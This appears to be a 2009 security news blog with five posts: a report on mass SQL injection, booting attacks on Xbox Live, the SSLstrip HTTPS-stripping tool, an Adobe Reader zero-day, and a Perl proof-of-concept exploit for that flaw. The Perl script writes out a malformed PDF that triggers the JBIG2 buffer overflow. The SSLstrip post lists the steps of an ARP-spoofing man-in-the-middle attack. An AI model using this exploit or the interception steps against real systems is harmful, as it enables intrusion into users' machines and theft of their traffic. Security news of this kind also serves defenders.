Feb 26 2009

SQL Injection attacks compromised 500,000 sites in 2008

Breach Security has released their annual Web Hacking Incidents Database (WHID) report. The focus is on the massive SQL Injection (SQLi) attacks seen online last year, and according to the data, more than 500,000 sites were compromised. The report states that SQLi attacks, with the aim of planting Malware on a compromised site, were the number one vector of attack in 2008.

WHID

The WHID report explains that there were three SQLi bots used in 2008, Nihaorr1, Asprox, and Evolution. They noted that while the initial attack vector was SQLi, overall the attacks more closely resembled Cross-Site Scripting methodology, citing the end goal of injecting malicious JavaScript into the victim’s browser as their logic. Moreover, the attacks were not after information on the server, they were after the user base of the website itself, taking advantage of a legit resource and exploiting the trust users have in it.

Another interesting aspect of the report centers on the site defacements seen in 2008.

Source: Tech Herald
http://tinyurl.com/dhoc7j

Feb 26 2009

Hackers target Xbox Live players

Halo 3
Xbox Live is being targeted by malicious hackers selling services that kick players off the network.

The booting services are proving popular with players who want a way to get revenge on those who beat them in an Xbox Live game.

The attackers are employing data flooding tools that have been used against websites for many years.

Microsoft is “investigating” the use of the tools and said those caught using them would be banned from Xbox Live.

Source: BBC News
http://news.bbc.co.uk/2/hi/technology/7888369.stm

Feb 26 2009

SSLstrip – HTTPS Stripping Attack Tool

This tool provides a demonstration of the HTTPS stripping attacks.
It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

To get this running:
* Flip your machine into forwarding mode.
* Setup iptables to redirect HTTP traffic to sslstrip.
* Run sslstrip.
* Run arpspoof to convince a network they should send their traffic to you.

That should do it.

How does this work?
First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

Download :
http://www.thoughtcrime.org/software/sslstrip/

Feb 25 2009

Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day

#!/usr/bin/perl
# k`sOSe 02/22/2009

# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

my $size = “\x40\x00″;
my $factor = “ABCD”;
my $data = “A” x 8314;

print pdf();

sub pdf()
{

“%PDF-1.5\n” .
“%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n” .
“3 0 \n” .
“xref\n” .
“3 16\n” .
“0000000023 00000 n \n” .
“0000000584 00000 n \n” .
“0000000865 00000 n \n” .
“0000001035 00000 n \n” .
“0000001158 00000 n \n” .
“0000001287 00000 n \n” .
“0000001338 00000 n \n” .
“0000001384 00000 n \n” .
“0000002861 00000 n \n” .
“0000003637 00000 n \n” .
“0000005126 00000 n \n” .
“0000005173 00000 n \n” .
“0000005317 00000 n \n” .
“0000005370 00000 n \n” .
“0000005504 00000 n \n” .
“0000000714 00000 n \n” .
“trailer\n” .
“< ]/Size 19/Prev 10218>>\n” .
“startxref\n” .
“0\n” .
“%%EOF\n” .
” \n” .
“4 0 obj\n” .
“<>>>>>\n” .
“endobj\n” .
” \n” .
“5 0 obj\n” .
“<>>>/Contents 6 0 R/Parent 1 0 R>>\n” .
“endobj\n” .
“6 0 obj\n” .
“<>\n” .
“stream\n” .
“x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k“\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
"S\xb0\n" .
"\x00J\x15#,\n" .
"endstream\n" .
"endobj\n" .

"12 0 obj\n" .
"<>\n” .
“stream\n” .
“\x00\x00\x00\x01″ . $size . $factor . “\x13″ . $data . “endstream\n” .
“endobj\n” .
“13 0 obj\n” .
“<>\n” .
“endobj\n” .
“14 0 obj\n” .
“<>\n” .
“stream\n” .
“\x00\n” .
“endstream\n” .
“endobj\n” .

“1 0 obj\n” .
“<>\n” .
“endobj\n” .
“xref\n” .
“0 3\n” .
“0000000000 65535 f \n” .
“0000009988 00000 n \n” .
“0000010039 00000 n \n” .
“trailer\n” .
“< ]/Size 3>>\n” .
“startxref\n” .
“104\n” .
“%%EOF\n”;

}

# milw0rm.com [2009-02-23]

Feb 23 2009

Hackers targeting zero-day vulnerability on Adobe Reader and Acrobat

Hackers are targeting a zero-day vulnerability affecting Adobe Reader and Acrobat with malicious PDF files. Adobe officials say a fix for the issue will be available for Adobe Reader and Adobe Acrobat in the coming weeks.

Hackers have once again turned to PDF files to spread their wares, this time assaulting a zero-day flaw affecting Adobe Reader and Acrobat.

Fortunately, the unpatched bug is on the company’s radar, and fixes for Adobe Reader 9 and Acrobat 9 are slated to be available March 11. Updates for earlier versions will come later, company officials said in an advisory.

The bug is due to an error in the parsing of certain structures in PDF files. If exploited successfully, the bug could allow a hacker to take complete control of a vulnerable system.

Source: eWeek
http://tinyurl.com/bzqfly